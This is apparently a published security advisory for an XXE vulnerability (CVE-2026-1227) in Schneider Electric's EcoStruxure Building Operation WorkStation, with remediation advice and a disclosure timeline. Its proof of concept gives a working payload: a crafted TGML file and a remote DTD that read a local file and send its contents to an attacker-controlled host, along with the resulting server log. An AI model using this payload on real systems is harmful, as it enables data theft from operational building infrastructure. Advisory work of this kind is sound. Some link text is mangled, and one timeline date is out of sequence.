usd-2025-45 | EcoStruxure Building Operation - WorkStation 7.0.2.348 - XML External Entity Injection

Product: EcoStruxure Building Operation - WorkStation
Affected Version: 7.0.2.348
Vulnerability Type: Improper Restriction of XML External Entity Reference (CWE-611)
Security Risk: CRITICAL
Vendor: Schneider Electric
Vendor URL: https://ecostruxure-building-help.se.com/bms/topics/show.castle?id=8064&locale=en-US&productversion=7.0
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2026-1227
CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2026-1227
Advisory ID: usd-2025-45

Description

The interface allows processing of external XML entities.
Due to this, the tgml-viewer accepts malicious Graphics in TGML format with external entities enabled, allowing attackers to reference local files or remote resources.

The inclusion of local files exposes the highest potential risk.
Sensitive data, e.g. password hashes, residing on the server can possibly be accessed by an adversary.
Additionally, an attacker may be able to circumvent network segmentation mechanisms or firewalls when using URLs in the entity, because requests are sent by the targeted server and not by the attacker's host.
One possible goal here might be to perform a scan of the internal network.
This can be achieved by examining the results of the manipulated queries.
Furthermore, the targeted system can be abused to launch denial of service attacks (DoS) on third party systems by injecting a large number of external references into the request.

Proof of Concept

In the following excerpt, a crafted TGML document is shown, which contains external entities:

<?xml version="1.0"?>
<!DOCTYPE tgml [
<!-- External entity - to test server -->
<!ENTITY % externalHttp SYSTEM "[http://154.5.45.18:8081/scanner.dtd">]()
%externalHttp;]>
<?tgml version="2.0"?>
<Tgml Background="#E0E0E0" ComponentCounter="4" GridSize="10">
<!-- External HTTP entity -->
<Text FontFamily="Arial" FontSize="20" FontStyle="Normal"
FontWeight="Normal" HorizontalAlign="Left" Left="0.0"
Opacity="1.0" TextDecoration="None" Top="10.0"
VerticalAlign="Top">
External DTD Test
</Text>
</Tgml>

On the attacker server, the following scanner.dtd file was hosted on port 8081:

<!ENTITY % f SYSTEM "file:///C:/Users/Public/secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; show SYSTEM '[http://154.5.45.18:1337/%f;'>">]()
%eval;
%show;

To prove this vulnerabilty, the following PoC file was created on the host that runs WorkStation:

PS C:\\> cat C:/Users/Public/secret.txt
V3ry-S3cret

A malicious Graphic is now created in WorkStation using the crafted TGML document shown above:

When inspecting the newly created Graphic in WorkStation, it shows an error message as shown below:

However, there was a callback on port 1337 of the attacker server containing the content of the previously created PoC file in the called endpoint:

$ python3 -m http.server 1337
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
154.5.45.17 - - [04/Sep/2025 13:40:14] code 404, message File not found
154.5.45.17 - - [04/Sep/2025 13:40:14] "GET /V3ry-S3cret HTTP/1.1" 404 -

Fix

It is recommended to disable the processing of external entities, if this feature is not explicitly required.
As an alternative, requests to external entities may be restricted, e.g. by using a list of allowed resources or hosts.

References

A official advisory by Schneider Electric can be found here: https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-041-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-041-02.pdf

Timeline

  • 2025-09-12: Vulnerabilities reported to Schneider Electric
  • 2026-09-19: Schneider Electric assign the internal IDs SE-20492, SE-20493 and SE-20494
  • 2026-01-02: After multiple follow-ups, the vendor reports that the investigation of the report is finished and that a fix will be released in early Q1 2026
  • 2026-07-14: This advisory is published.

Credits

This security vulnerability was identified by Robin Plugge of usd AG.